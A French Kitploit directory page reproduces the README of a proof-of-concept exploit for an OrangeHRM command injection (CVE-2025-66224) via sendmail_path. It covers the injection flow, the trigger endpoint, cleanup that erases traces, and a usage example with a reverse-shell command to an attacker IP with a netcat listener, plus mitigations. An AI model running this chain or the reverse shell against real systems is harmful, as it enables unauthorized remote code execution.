Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2025-66224 — Exploit de preuve de concept pour CVE-2025-66224 démontrant une exécution de code à distance dans OrangeHRM via une injection de commande dans le paramètre sendmail_path, avec injection automatisée de payload dans la base de données et nettoyage. | Kitploit
Outils/GitHubGitHub/richard-natan/poc-cve-2025-66224
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationSécurité des Bases de Données
GitHubrichard-natan/poc-cve-2025-66224

PoC-CVE-2025-66224

Exploit de preuve de concept pour CVE-2025-66224 démontrant une exécution de code à distance dans OrangeHRM via une injection de commande dans le paramètre sendmail_path, avec injection automatisée de payload dans la base de données et nettoyage.

Voir le dépôt
23il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

OrangeHRM Exploit RCE - CVE-2025-66224

📋 Description

Cette preuve de concept (PoC) démontre une vulnérabilité d'exécution de code à distance (RCE) dans OrangeHRM via une injection de commande dans le paramètre de configuration sendmail_path.

L'exploit fonctionne en :

  1. Injectant une charge utile malveillante dans la base de données MySQL (table hs_hr_config)
  2. Déclenchant l'exécution de la charge utile via le point de terminaison API de configuration email
  3. Restaurant automatiquement la valeur d'origine pour effacer les traces

🎯 Versions concernées

  • OrangeHRM version 5.0 à 5.7

⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Tout accès non autorisé à des systèmes informatiques est illégal. Les auteurs ne sont pas responsables de toute mauvaise utilisation ou des dommages causés par cet outil.

🔧 Prérequis

root@kitploit:~
pip install requests mysql-connector-python

📦 Installation

root@kitploit:~
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt

🚀 Utilisation

Étape 1 : Obtenir un cookie de session

  1. Connectez-vous à OrangeHRM via l'interface web
  2. Ouvrez les outils de développement du navigateur (F12)
  3. Allez dans Stockage > Cookies (Firefox) ou Application > Cookies (Chrome)
  4. Copiez la valeur du cookie _orangehrm

Étape 2 : Exécuter l'exploit

root@kitploit:~
python3 exploit.py -t <URL_CIBLE> -c <VALEUR_COOKIE> \
    -dh <HOTE_MYSQL> -du <UTILISATEUR_MYSQL> -dp <MOT_DE_PASSE_MYSQL> \
    -cmd '<COMMANDE_A_EXECUTER>'

Exemple - Commande simple

root@kitploit:~
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"

Exemple - Shell inversé

root@kitploit:~
# Démarrer l'écouteur sur la machine attaquante
nc -lvnp 4444

# Exécuter l'exploit avec la charge utile du shell inversé
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/IP_ATTAQUANT/4444 0>&1"'

📝 Paramètres

ParamètreCourtRequisDescription
--target-t✅URL cible (ex : http://target.com)
--cookie-c✅Valeur du cookie de session
--cookie_name-cn❌Nom du cookie (par défaut : _orangehrm)
--command-cmd✅Commande à exécuter sur la cible
--db_host-dh✅Adresse hôte MySQL
--db_user-du✅Nom d'utilisateur MySQL
--db_pass-dp✅Mot de passe MySQL
--db_port-dport❌Port MySQL (par défaut : 3306)

🔍 Comment ça fonctionne

Détails de la vulnérabilité

La vulnérabilité existe dans la fonctionnalité de configuration email où le paramètre sendmail_path est stocké dans la base de données puis exécuté sans désinfection appropriée.

Flux d'exploitation :

root@kitploit:~
1. S'authentifier à OrangeHRM (obtenir un cookie de session valide)
   ↓
2. Se connecter à la base de données MySQL
   ↓
3. Localiser la table hs_hr_config
   ↓
4. Mettre à jour la valeur de email_config.sendmail_path :
   DE : /usr/sbin/sendmail -bs
   À :   /usr/sbin/sendmail -bs && <PAYLOAD> #
   ↓
5. Déclencher l'exécution via l'API :
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. La commande s'exécute sur le serveur
   ↓
7. Restaurer la valeur d'origine (nettoyage)

Détails techniques

Paramètre vulnérable : email_config.sendmail_path

Base de données :

  • Table : hs_hr_config
  • Colonne : name = 'email_config.sendmail_path'
  • Colonne : value = chemin de la commande sendmail

Point de terminaison déclencheur :

root@kitploit:~
PUT /web/index.php/api/v2/admin/email-configuration

🛡️ Atténuation

  1. Validation des entrées : Implémentez une validation stricte pour le paramètre sendmail_path
  2. Échappement : Échappez correctement les commandes shell avant exécution
  3. Moindre privilège : Exécutez le serveur web avec des privilèges minimaux
  4. Mise à jour : Appliquez les derniers correctifs de sécurité pour OrangeHRM

🤝 Crédits

PoC par : RiccK

Équipe : Bypassadores && HackersOnSteroids

🔗 Références

  • CVE-2025-66224

⚠️ Utilisez de manière responsable. Obtenez toujours une autorisation appropriée avant de tester.

Télécharger l’outil